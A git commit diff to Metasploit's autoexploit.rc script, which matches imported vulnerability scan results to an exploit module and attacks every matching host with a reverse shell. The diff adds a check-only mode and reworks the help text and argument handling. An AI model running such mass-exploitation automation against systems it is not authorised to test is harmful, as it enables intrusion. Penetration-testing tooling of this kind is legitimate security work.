Merge branch 'm-1-k-3-autoexploit' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-m-1-k-3-autoexploit

2012-07-10 16:11:46 -05:00 · 2012-07-10 16:11:46 -05:00 · 3d4449c1e7
parent 06974cbc43 ce107fbd6f
commit 3d4449c1e7
1 changed files with 49 additions and 23 deletions
--- a/scripts/resource/autoexploit.rc
+++ b/scripts/resource/autoexploit.rc
@ -1,6 +1,3 @@
-# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)
-
-
 <ruby>
 #
 # Print the help function
@ -8,29 +5,31 @@
 def help_me
 	help = %Q|
 	Description:
-		This Metasploit RC file can be used to automate the exploitation process.  Before
-		using this script, you should import your vulnerability results to Metasploit, and
-		then it will exploit each possible host when there is a match to one of the
-		references.  A reverse shell is automatically selected for you, and will always
-		default to a suitable meterpreter.
+		This Metasploit RC file can be used to automate the exploitation process.  Before using the
+		script, you must import your vulnerability results to Metasploit so that it can deploy the
+		module based on matching references. Three modes are available: exploit/dry/and check.
+		In exploit mode, it will attempt to gain access to all vulnerable hosts with the most
+		suitable reverse shell that's automatically selected.  In "dry" mode (dry-run), it'll list
+		all the hosts vulnerable to the exploit.  In check mode, it will only trigger the check()
+		function found in the module.  If no mode is specified, then it'll default to 'exploit'.

 	Usage:
-		./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [dry]
+		./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode]

 	Arguments:
 		rc_path      - Full path to the RC script
-		db_user      - Username for MSF database       (datastore: 'DB_USER')
-		db_pass      - Password for MSF database       (datastore: 'DB_PASS')
-		db_worksapce - Workspace for the database      (datastore: 'DB_WORKSPACE')
-		module_path  - Path to the exploit             (datastore: 'MODULE')
-		dry          - Optional. Dry-run mode [yes/no] (datastore: 'DRY')
+		db_user      - Username for MSF database           (datastore: 'DB_USER')
+		db_pass      - Password for MSF database           (datastore: 'DB_PASS')
+		db_worksapce - Workspace for the database          (datastore: 'DB_WORKSPACE')
+		module_path  - Path to the exploit                 (datastore: 'MODULE')
+		mode         - Optional. Accept:exploit/dry/check  (datastore: 'MODE')

-	Example:
+	Example of running an exploit:
 		msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi

 	Authors:
-		m-1-k-3 <m1k3[at]s3cur1ty.de>
 		sinn3r  <sinn3r[at]metasploit.com>
+		m-1-k-3 <m1k3[at]s3cur1ty.de>
 	|

 	help = help.gsub(/^\t/, '')
@ -116,7 +115,7 @@ end


 #
-# Start the exploitation
+# Exploit mode
 #
 def auto_exploit(module_path)
 	exploit = load_exploit(module_path)
@ -148,7 +147,7 @@ end


 #
-# Find all mathing references
+# Dry-run mode
 #
 def dry_run(module_path)
 	exploit = load_exploit(module_path)
@ -159,7 +158,29 @@ def dry_run(module_path)
 	framework.db.workspace.vulns.each do |vuln|
 		next if not ref_has_match(vuln.refs, exploit_refs)
 		addr = vuln.host.address.to_s
-		print_good("#{addr} seems vulnerable to #{exploit.shortname}")
+		print_good("#{addr} has a matching reference to #{exploit.shortname}")
+	end
+end
+
+
+#
+# Check mode
+#
+def check_exploit(module_path)
+	exploit = load_exploit(module_path)
+	raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil?
+
+	exploit_refs = exploit.references
+
+	framework.db.workspace.vulns.each do |vuln|
+		next if not ref_has_match(vuln.refs, exploit_refs)
+		print_good("Checking #{exploit.shortname} against host #{vuln.host.address.to_s}")
+		run_single("use #{exploit.fullname}")
+		run_single("set RHOST #{vuln.host.address.to_s}")
+		run_single("check")
+		select(nil, nil, nil, 1)
+		run_single("back")
+		print_line()
 	end
 end

@ -192,7 +213,7 @@ def init_args
 	args[:db_pass]      = ARGV.shift || datastore['DB_PASS'] || ''
 	args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || ''
 	args[:module]       = ARGV.shift || datastore['MODULE'] || ''
-	args[:dry]          = (ARGV.shift || datastore['DRY']) =~ /^yes$/i ? true : false
+	args[:mode]         = ARGV.shift || datastore['MODE'] || 'exploit'

 	raise ArgumentError, "Missing a module path" if args[:module].empty?

@ -217,10 +238,15 @@ begin
 		end
 	end

-	if args[:dry]
-		dry_run(args[:module])
-	else
+	case args[:mode]
+	when /^exploit$/i
 		auto_exploit(args[:module])
+	when /^dry$/i
+		dry_run(args[:module])
+	when /^check$/i
+		check_exploit(args[:module])
+	else
+		raise ArgumentError, "Invalid mode"
 	end

 rescue ArgumentError => e